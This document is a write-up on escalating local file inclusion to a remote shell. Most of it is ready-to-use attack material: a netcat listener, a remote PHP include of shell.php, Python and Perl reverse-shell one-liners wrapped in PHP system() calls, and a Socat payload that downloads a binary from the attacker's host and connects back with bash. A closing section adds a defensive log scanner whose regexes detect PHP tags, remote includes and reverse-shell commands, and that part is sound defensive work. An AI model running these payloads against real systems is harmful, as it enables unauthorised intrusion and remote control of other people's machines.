Gaining remote shell with LFI2RCE
I explored methods to gain a remote shell on the machine. The following methods can be used (with the VRFY or RCPT TO: command with SMTP explored before) to run remote commands to establish the shell.
The link below contains all the reverse shell payloads we will be using:
For each of the methods, we need to start a TCP listener on a certain port to catch the shell:
$ nc -lvp <port>
1. PHP shell
a. Download the PHP shell from the link above, and load the content into a file such as shell.php (remember to update the host and port values):
Start a web server from the same directory as the shell:
$ python3 -m http.server <port>
b. Include the address of the web server to load the PHP shell (using RCE we have found earlier):
<?php include('http://<host>:<port>/shell.php'); ?>
2. Python shell
a. Identify if Python is available:
<?php system('python --version'); ?>
b. If available, we can invoke a Python reverse shell:
Replace the <host> and <port> with the appropriate values:
<?php system("python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<host>',<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\""); ?>
3. Perl shell
a. Identify if Perl is available:
<?php system('perl --version'); ?>
b. If available, we can invoke a Perl shell:
Replace the <host> and <port> with the appropriate values:
<?php system('perl -e \'use Socket;$i="<host>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''); ?>
4. Socat stable shell
a. Check if Socat is available. However, chances are that it will not be available. We can install the Socat binary and host it from a web server on our machine, and have the target retrieve it.
First, download the Socat binary and host it from the local machine (the web server below listens on port 8000 by default, which the payload in the next step assumes):
$ curl -L -o socat 'https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true'
$ python3 -m http.server <port>
Next, we can send the payload to the target:
<?php system('curl http://<host>:8000/socat --output /tmp/socat && chmod +x /tmp/socat && /tmp/socat TCP:<host>:8002 EXEC:"bash -li",pty,stderr,sigint,setsid,sane'); ?>
In this payload, a few things are happening:
Retrieve the Socat binary and save it to a temporary directory (/tmp/socat)
Add execute permission on the binary
Invoke a Socat reverse shell from the target to our machine
Note that this shell is considered to be more stable as compared to the other options discussed before.
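From the defender's side, the chain above leaves two distinct traces: a PHP tag written into a log that should never contain code (the SMTP VRFY/RCPT TO poisoning), and a web request whose include parameter points at that log file or at a remote URL. The following script is an added example, not part of the original writeup; it runs a few regex signals over constructed mail-log and access-log lines (the `page` parameter, the IP addresses and the signal names are assumptions made for this example) and reports when both halves of the chain appear together.

```python
import re
from typing import Dict, List

# Constructed sample log lines (not real traffic). Line 1 is a Postfix-style
# entry where the SMTP RCPT TO value carries a PHP tag (log poisoning); lines
# 2-3 are web access-log entries that include the poisoned mail log and then a
# remote PHP file through a hypothetical "page" parameter; line 4 is benign.
SAMPLE_LOGS = [
    "Apr  2 10:01:12 mx postfix/smtpd[2121]: NOQUEUE: reject: RCPT from "
    "unknown[203.0.113.5]: 550 <<?php system('perl --version'); ?>@x.test>",
    '203.0.113.5 - - [02/Apr/2024:10:02:03 +0000] "GET /index.php?page=/var/log/mail.log HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/Apr/2024:10:03:40 +0000] "GET /index.php?page=http://203.0.113.5:8000/shell.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [02/Apr/2024:10:04:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024',
]

# (signal name, pattern); the names are assumed labels chosen for this example.
SIGNALS = [
    ("php_tag", re.compile(r"<\?(php|=)", re.I)),                      # PHP code inside a log stream
    ("remote_include", re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),  # parameter pointing at a URL
    ("log_file_include", re.compile(r"[?&]\w+=[^&\s\"]*(/var/log/|\.\./)", re.I)),  # log path / traversal
    ("shell_cmd", re.compile(r"(python3? -c|perl -e|socat |/bin/sh -i|bash -li)", re.I)),
]

def scan_line(line: str) -> List[str]:
    """Return the names of every signal that matches this log line."""
    return [name for name, pat in SIGNALS if pat.search(line)]

def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that triggered at least one signal."""
    findings = []
    for n, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings.append({"line": n, "signals": hits, "text": line})
    return findings

def has_poisoning_chain(findings: List[Dict[str, object]]) -> bool:
    """True when a PHP tag landed in a log AND a request included a log file:
    both halves of the LFI-to-RCE chain seen in the same log set."""
    names = {s for f in findings for s in f["signals"]}
    return "php_tag" in names and "log_file_include" in names

if __name__ == "__main__":
    results = scan_logs(SAMPLE_LOGS)
    for f in results:
        print(f"line {f['line']}: {', '.join(f['signals'])}")
    print("poisoning chain present:", has_poisoning_chain(results))
```

Alerting on `php_tag` alone in a mail log is already worth doing, since legitimate SMTP traffic has no reason to carry a PHP open tag; the `remote_include` signal only matters where `allow_url_include` is enabled, which is the setting the PHP shell method above depends on.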